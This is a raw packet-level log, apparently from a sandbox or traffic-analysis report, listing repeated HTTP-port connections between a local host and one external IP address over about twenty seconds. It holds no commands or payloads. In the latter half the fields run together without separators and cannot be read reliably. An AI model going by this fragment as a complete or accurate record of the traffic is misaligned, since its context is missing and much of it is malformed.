Jan 10, 2025 07:58:30.462378025 CET  80  49996  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:30.814064026 CET  49996  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:30.818975925 CET  80  49996  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:30.818984985 CET  80  49996  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:30.818991899 CET  80  49996  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:31.195014954 CET  80  49996  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:31.235877037 CET  49996  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:31.345979929 CET  80  49996  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:31.392105103 CET  49996  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:31.472979069 CET  50002  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:31.477929115 CET  80  50002  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:31.477999926 CET  50002  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:31.478198051 CET  50002  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:31.483083010 CET  80  50002  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:31.829890966 CET  50002  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:31.834872007 CET  80  50002  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:31.834882975 CET  80  50002  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:31.834942102 CET  80  50002  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:32.208966017 CET  80  50002  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:32.302511930 CET  50002  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:32.304784060 CET  50008  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:32.307760954 CET  80  50002  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:32.307832956 CET  50002  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:32.309693098 CET  80  50008  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:32.309827089 CET  50008  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:32.310082912 CET  50008  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:32.315107107 CET  80  50008  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:32.448961973 CET  50009  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:32.453891039 CET  80  50009  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:32.453965902 CET  50009  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:32.454057932 CET  50009  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:32.458947897 CET  80  50009  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:32.723364115 CET  50008  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:32.729511976 CET  80  50008  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:32.730524063 CET  80  50008  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:32.798728943 CET  50009  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:32.803659916 CET  80  50009  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:32.803674936 CET  80  50009  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:32.803725004 CET  80  50009  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:33.081465006 CET  80  50008  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:33.126665115 CET  50008  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:33.210731983 CET  80  50008  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:33.235840082 CET  80  50009  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:33.251483917 CET  50008  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:33.314009905 CET  50009  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:33.369803905 CET  80  50009  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:33.504899025 CET  50009  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:33.505768061 CET  49996  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:33.508651018 CET  50008  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:33.508723021 CET  50009  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:33.508929014 CET  50017  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:33.513703108 CET  80  50008  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:33.513755083 CET  50008  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:33.513923883 CET  80  50017  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:33.513933897 CET  80  50009  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:33.513976097 CET  50017  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:33.514003038 CET  50009  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:33.514111042 CET  50017  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:33.518902063 CET  80  50017  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:33.860999107 CET  50017  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:33.866027117 CET  80  50017  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:33.866040945 CET  80  50017  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:33.866050005 CET  80  50017  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:34.276427984 CET  80  50017  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:34.329627037 CET  50017  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:34.426084042 CET  80  50017  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:34.427423954 CET  50017  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:34.432492971 CET  80  50017  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:34.432548046 CET  50017  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:34.550693035 CET  50023  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:34.555615902 CET  80  50023  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:34.555691004 CET  50023  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:34.555908918 CET  50023  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:34.560740948 CET  80  50023  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:34.907839060 CET  50023  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:34.912807941 CET  80  50023  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:34.912823915 CET  80  50023  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:34.912836075 CET  80  50023  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:35.311350107 CET  80  50023  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:35.360871077 CET  50023  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:35.463435888 CET  80  50023  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:35.517148972 CET  50023  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:35.941978931 CET  50023  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:35.944987059 CET  50028  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:35.947072029 CET  80  50023  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:35.947720051 CET  50023  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:35.949855089 CET  80  50028  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:35.949933052 CET  50028  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:35.950889111 CET  50028  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:35.955703020 CET  80  50028  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:36.298559904 CET  50028  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:36.303723097 CET  80  50028  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:36.303741932 CET  80  50028  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:36.303752899 CET  80  50028  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:36.692507982 CET  80  50028  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:36.735898972 CET  50028  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:36.810141087 CET  50028  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:36.815237999 CET  80  50028  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:36.815326929 CET  50028  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:36.818598032 CET  50039  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:36.823426008 CET  80  50039  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:36.823513031 CET  50039  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:36.823646069 CET  50039  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:36.828414917 CET  80  50039  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:37.173472881 CET  50039  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:37.178489923 CET  80  50039  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:37.178505898 CET  80  50039  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:37.178518057 CET  80  50039  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:37.561105013 CET  80  50039  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:37.610972881 CET  50039  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:37.713267088 CET  80  50039  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:37.814028978 CET  50039  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:37.851094961 CET  50039  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:37.852345943 CET  50045  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:37.856441975 CET  80  50039  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:37.856511116 CET  50039  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:37.857218027 CET  80  50045  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:37.857287884 CET  50045  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:37.857400894 CET  50045  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:37.862241983 CET  80  50045  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:38.204751968 CET  50045  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:38.209651947 CET  80  50045  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:38.209883928 CET  80  50045  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:38.209913015 CET  80  50045  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:38.221052885 CET  50046  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:38.221282005 CET  50045  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:38.225922108 CET  80  50046  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:38.226001978 CET  50046  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:38.269961119 CET  80  50045  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:38.270625114 CET  50046  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:38.275547028 CET  80  50046  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:38.368782997 CET  80  50045  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:38.371337891 CET  50045  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:38.628175020 CET  50046  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:38.633833885 CET  80  50046  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:38.634347916 CET  80  50046  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:38.842470884 CET  50050  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:38.847425938 CET  80  50050  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:38.847711086 CET  50050  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:38.880065918 CET  50050  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:38.885044098 CET  80  50050  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:39.107450008 CET  80  50046  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:39.157763958 CET  50046  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:39.236124992 CET  50050  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:39.236702919 CET  80  50046  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:39.240957022 CET  80  50050  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:39.240972996 CET  80  50050  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:39.241012096 CET  80  50050  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:39.282859087 CET  50046  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:39.586740017 CET  80  50050  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:39.704631090 CET  50050  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:39.720976114 CET  80  50050  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:39.814109087 CET  50050  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:39.842185974 CET  50050  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:39.842253923 CET  50046  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:39.842590094 CET  50058  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:39.848709106 CET  80  50058  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:39.848793983 CET  50058  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:39.848824024 CET  80  50050  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:39.848864079 CET  50050  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:39.848947048 CET  50058  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:39.849041939 CET  80  50046  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:39.849097967 CET  50046  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:39.855070114 CET  80  50058  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:40.205039978 CET  50058  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:40.212426901 CET  80  50058  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:40.212438107 CET  80  50058  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:40.212445974 CET  80  50058  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:40.664228916 CET  80  50058  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:40.798530102 CET  80  50058  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:40.798698902 CET  50058  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:40.973577976 CET  50058  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:40.973829985 CET  50064  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:40.979409933 CET  80  50058  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:40.979672909 CET  80  50064  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:40.979759932 CET  50058  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:40.979784966 CET  50064  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:40.979882956 CET  50064  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:40.985909939 CET  80  50064  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:41.333189964 CET  50064  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:41.339494944 CET  80  50064  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:41.339534998 CET  80  50064  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:41.339561939 CET  80  50064  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:41.724344969 CET  80  50064  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:41.813990116 CET  50064  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:41.962632895 CET  80  50064  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:41.962658882 CET  80  50064  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:41.962693930 CET  50064  80  192.168.2.4  89.23.100.242
                                                                                                Jan 10, 2025 07:58:42.077984095 CET5007080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:42.082873106 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:42.082937002 CET5007080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:42.083045959 CET5007080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:42.087929010 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:42.439197063 CET5007080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:42.444222927 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:42.444241047 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:42.444263935 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:42.826157093 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:42.977946997 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:42.978024006 CET5007080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:43.098156929 CET5007080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:43.100377083 CET5007780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:43.103194952 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.103347063 CET5007080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:43.105290890 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.105361938 CET5007780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:43.105462074 CET5007780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:43.110336065 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.454941034 CET5007780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:43.459930897 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.460033894 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.460062981 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.857805967 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.984622955 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.987204075 CET5007780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.107836962 CET5007780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.108071089 CET5006480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.108342886 CET5008780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.113215923 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.113285065 CET805008789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.113297939 CET5007780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.113348007 CET5008780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.113409042 CET5008780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.118318081 CET805008789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.252477884 CET5008880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.252480030 CET5008780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.258666992 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.258744955 CET5008880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.258855104 CET5008880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.264880896 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.301173925 CET805008789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.374876022 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.379806042 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.379894018 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.380027056 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.384882927 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.610959053 CET5008880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.617481947 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.617618084 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.649086952 CET805008789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.649162054 CET5008780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.735991001 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.741019964 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.741051912 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.741077900 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.209795952 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.209836006 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.209866047 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.209893942 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.209959030 CET5008880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.251590967 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.294086933 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.345257044 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.437062979 CET5008880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.437203884 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.437309027 CET5009080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.442347050 CET805009089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.442378998 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.442471027 CET5008880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.442492008 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.442534924 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.442540884 CET5009080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.442540884 CET5009080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.447408915 CET805009089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.798490047 CET5009080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.804363966 CET805009089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.804403067 CET805009089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.804431915 CET805009089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:46.219194889 CET805009089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:46.267182112 CET5009080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:46.389796019 CET805009089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:46.439024925 CET5009080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:46.518714905 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:46.523942947 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:46.524012089 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:46.524138927 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:46.528990030 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:46.876611948 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:46.881975889 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:46.882025957 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:46.882054090 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.362629890 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.407754898 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.500628948 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.548567057 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.622792006 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.623157978 CET5009080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.623210907 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.628156900 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.628200054 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.628236055 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.628248930 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.628360987 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.633241892 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.986047029 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.991272926 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.991341114 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.991379023 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:48.364654064 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:48.407766104 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:48.516638994 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:48.564016104 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:48.638070107 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:48.638243914 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:48.643220901 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:48.643336058 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:48.643358946 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:48.643476963 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:48.643496037 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:48.648334980 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.001590014 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.007229090 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.007246971 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.007261992 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.397394896 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.439097881 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.532780886 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.579763889 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.655388117 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.655499935 CET5009480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.660417080 CET805009489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.660495043 CET5009480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.660527945 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.660569906 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.660655975 CET5009480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.665400028 CET805009489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.017247915 CET5009480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.022279024 CET805009489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.022298098 CET805009489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.022310019 CET805009489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.221012115 CET5009580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.221309900 CET5009480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.226372957 CET805009589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.226458073 CET5009580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.226541996 CET5009580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.226577044 CET805009489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.226641893 CET5009480192.168.2.489.23.100.242
